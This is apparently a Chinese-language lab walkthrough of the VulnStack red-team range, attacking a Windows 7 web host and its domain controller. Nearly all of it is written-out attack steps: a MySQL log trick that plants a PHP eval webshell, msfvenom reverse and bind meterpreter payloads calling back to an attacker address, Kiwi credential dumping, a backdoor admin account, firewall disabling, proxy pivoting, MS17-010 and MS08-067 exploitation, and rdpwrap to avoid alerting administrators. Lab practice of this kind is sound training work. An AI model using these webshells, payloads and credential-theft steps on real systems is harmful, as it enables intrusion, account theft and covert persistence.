VulnStack超全面詳細的滲透測試筆記
這篇文章為群友@rural老哥投稿,靶場用的是紅日安全的“ATT&CK實戰系列——紅隊實戰(一)”。
下載地址:
- http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
文章正文
1. 根據網卡獲取的網段信息,對win7所在網段來一波存活主機檢測,排除其他的之后目標鎖定在主機號為128的主機上
2. 對發現的存活主機來一波整體信息收集發現開了以下的端口,并且是一個域用戶
┌──(root?kali)-[/]└─# nmap -A 192.168.164.128 Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-26 09:53 CSTNmap scan report for 192.168.164.128Host is up (0.00052s latency).Not shown: 989 closed portsPORT STATE SERVICE VERSION80/tcp open http Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45|_http-title: Site doesn't have a title (text/html).135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: GOD)1025/tcp open msrpc Microsoft Windows RPC1026/tcp open msrpc Microsoft Windows RPC1027/tcp open msrpc Microsoft Windows RPC1028/tcp open msrpc Microsoft Windows RPC1029/tcp open msrpc Microsoft Windows RPC1030/tcp open msrpc Microsoft Windows RPC3306/tcp open mysql MySQL (unauthorized)MAC Address: 00:0C:29:A7:C1:B2 (VMware)Device type: general purpose|media deviceRunning: Microsoft Windows 2008|10|7|8.1, Microsoft embeddedOS CPE: cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_10 cpe:/h:microsoft:xbox_one cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1OS details: Microsoft Windows Server 2008 SP2, Microsoft Windows Server 2008 SP2 or Windows 10 or Xbox One, Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1Network Distance: 1 hopService Info: Host: STU1; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results:|_clock-skew: mean: -2h40m00s, deviation: 4h37m07s, median: 0s|_nbstat: NetBIOS name: STU1, NetBIOS user: , NetBIOS MAC: 00:0c:29:a7:c1:b2 (VMware)| smb-os-discovery: | OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional| Computer name: stu1| NetBIOS computer name: STU1\x00| Domain name: god.org| Forest name: god.org| FQDN: stu1.god.org|_ System time: 2021-07-26T09:55:13+08:00| smb-security-mode: | account_used: guest| authentication_level: user| challenge_response: supported|_ message_signing: disabled (dangerous, but default)| smb2-security-mode: | 2.02: |_ Message signing enabled but not required| smb2-time: | date: 2021-07-26T01:55:13|_ start_date: 2021-07-26T01:43:45 TRACEROUTEHOP RTT ADDRESS1 0.51 ms 192.168.164.128 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 85.47 seconds
?3. 訪問改web服務器的地址獲取頁面內容,發現并沒有什么可以利用的東西,只能先目錄掃描獲取一些有用有用信息
4. 用dirsearch工具來掃描,kali默認沒有安裝,自己裝一下就好了,發現有phpmyadmin的目錄,說明安裝了phpmyadmin,正好和端口掃描的3306 mysql服務相對應,然后在把目錄都訪問一遍之后發現了phpstudy探針
└─dirsearch -u http://192.168.164.128
5. 本來想著找個python腳本爆破一下,可惜網上的大多用不了,手動猜出來了root:root,登陸進去之后就是通過phpmyadmin寫入webshell了
我們這里用日志寫入一句話的方式,首先進入phpmyadmin后臺,查看genelog變量,更改general log和general log file參數,初始設置general log是OFF,我們將其改成ON;general log file改成網站的根目錄,通過phpstudy指針已經知道了網站根目錄
show global variables like '%general%';
set global general_log='on';
set global general_log_file='C:/phpStudy/PHPTutorial/WWW/shell.php';
這邊寫入大馬意識可以的:select ' eval($_POST["shell"]);?>';
6. 蟻劍連接不用多說了,這邊有個坑,蟻劍下載插件的時候用了代理,本地環境連接一直連不上,人麻了,測試了一下權限administrator真的高
7. 查看根目錄之后發現了一個cms,我們在瀏覽器訪問,自己安裝的phpstudy打不開這個管理系統,把原來的phpstudy重啟一下完美解決
不用掃目錄之類的了,主頁面已經給了出來信息直接用,進入后臺并登錄
8. 在前臺模板哪里發現了上傳點,我們可以上傳一個大馬,奧里給!創建了一個名為shell_1.php的文件,然后就是查找創建的目錄
9. 找了半天,在robots.txt里面找到了目錄一個一個找出來了,不過好像可以目錄穿越出來,我試了幾下沒粗來,不過這個大馬子挺好用
10. 看了一下教程,說是留言板有個xss的,我們也來試試
<script>alert('xss')script>
成功彈窗
11. 不整那么多了,現在就是經典內網環節,先用msf生成馬子用蟻劍上傳,反彈shell用msf監聽
msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.164.129 LPORT=1222 -f exe -o asd.exe
把生成的馬子傳上去之后執行,msf監聽拿到會話
use exploit/mutli/handlerset payload windows/x64/meterpreter_reverse_tcpset lhost 192.168.164.129set lport 1222
12. 本來獲得會話之后就要是要提權,這個進來之后就是admin,所以省略這一步,我們直接抓取域用戶的密碼信息
13. 加載Kiwl插件獲取hash并解密
ps:migrate PID(進程遷移)這邊meterpreter是32位的,系統是64位的,所以得遷移進程 meterpreter > load Kiwimeterpreter > creds_all
14. 開啟3389端口,進入遠程桌面,用nmap看看開了沒,這邊還需要自己添加用戶
net user test Admin123 /add # 添加賬戶密碼net localgroup administrators test /add # 給test賬戶添加為管理員權限net user test # 查詢是否成功添加test用戶
run post/windows/manage/enable_rdp
rdesktop 192.168.164.128:3389 kali的一個遠程工具
15. 開始橫向移動,先自動創建路由
run post/multi/manage/autoroute
16. 掛起會話,通過post/multi/manage/autoroute 這個模塊查看路由表
17. 使用auxiliary/server/socks_proxy這個模塊開進行socks代理,設置好服務器ip和端口,運行后自動掛入后臺
18. 修改/etc/proxychains.conf文件
19. 查看socks5的端口開啟了沒
20. 起來了之后就可以使用nmap掃描到內網的存活主機,這樣掃描起來有點慢
proxychains nmap -sT -Pn 192.168.52.143
21. 我們這里使用msf自帶的模塊來掃描,發現了兩臺存活的主機
use auxiliary/scanner/netbios/nbname
22. 再用msf的端口掃描模塊對發現的主機掃描,查看開放的端口,這邊雙管齊下,掃描的太慢了
use auxiliary/scanner/portscan/tcp
23. 都開了445端口經典ms17_010利用起來,先掃描發現有ms17_010的洞
use auxiliary/scanner/smb/smb_ms17_010
24. 既然都有洞了,我門直接絲滑小連招,使用ms17_010的command模塊可以執行指令
use auxiliary/admin/smb/ms17_010_command
25. 這個上車補票衛視不晚,我們搜集一波域信息
net config workstation 查看是否有域,以及當前登錄域
這邊有一個亂碼問題,我們在shell視圖輸入,完美解決
C:\Windows\system32>chcp 65001 net view 查看域內主機列表
net group "domain controllers" /domain 查看域控制器(如果有多臺)
然后通過 ping 命令查看域中主機的ip
net user /domain 查看域內所有域用戶
net group "domain admins" /domain 查看域管理員列表
26. 完全可以用ms17_010command模塊來執行命令,打開3389添加用戶,登陸進去,其實在win7上就拿到了管理員用戶名和密碼,不過這是練習,我們就在繼續騷操作
我們通過彈一個正向shell (因為msf 開了代理,所以不能彈反向shell),我們可以win7遠程桌面,所給把馬子傳給win7然后開共享目錄,下載到域控上面,然后執行
msfvenom -p windows/meterpreter/bind_tcp -f exe -o /home/dzj/s.exe
msfconsole開啟監聽
use exploit/multi/handler
win7開啟共享
然后用域控的ms17_010command執行復制指令
copy \\192.168.52.143\WWW\s.exe C:\s.exe
這里又有一個坑,win7防火墻開了,導致域控一直下載不了文件,麻了
查看放防火墻狀態:netsh advfirewall show allprofile state
關閉所有防火墻:netsh advfirewall set allprofiles state off
歐克再試試下載文件,不能下載,我們用其他方法
set command copy \\\\STU1\\WWW\\s2.exe C:\\s2.exe
這里我是下完之后試的,重啟機子就好了,我tm
然后就是msf監聽了
set payload windows/x64/meterpreter/bind_tcp
一直連不上shell應該是防火墻的原因,不過我在用win7的nmap掃描之后發現了ms08_067
27. 利用exploit/windows/smb/ms08_067_netapi這個模塊直接拿shell
set payload windows/meterpreter/bind_tcp
28. 利用一下win7上的nmap了掃描一下另外兩個主機,兩個主機都有ms17_010的洞,不過有一臺是32位的系統利用不了,只能從另一臺下手了
exploit/windows/smb/ms17_010_eternalblue
這還有坑這個主機開了防火墻,我之前試了幾次一直拿不到shell,用ms17_010command執行指令關閉之后就返回了shell,這個因為開了代理所以得用set payload windows/x64/meterpreter/bind_tcp正向連接
29. 現在就是抓取hash密碼,開啟遠程桌面,作為桌面黨開了遠程桌面才算舒服了~~~
套娃ing,這里可以用端口轉發,我直接在win7的遠程再開一個遠程
30. 最后一個其實已經拿到域管理員的密碼了可以直接用ms17_010commad關閉防火墻打開3389了
這里還有一點對于非服務器版本的windows 遠程登錄的話,會斷開該主機當前的連接,有可能會驚動管理員。這個時候不慌,可以使用rdpwrap。
rdpwrap是一款可以允許非服務器版本進行多個用戶登錄的patcher,從github上面下載下來,用蟻劍把 RDPWInst.exe 傳上去,然后執行:
RDPWInst.exe -i -s??
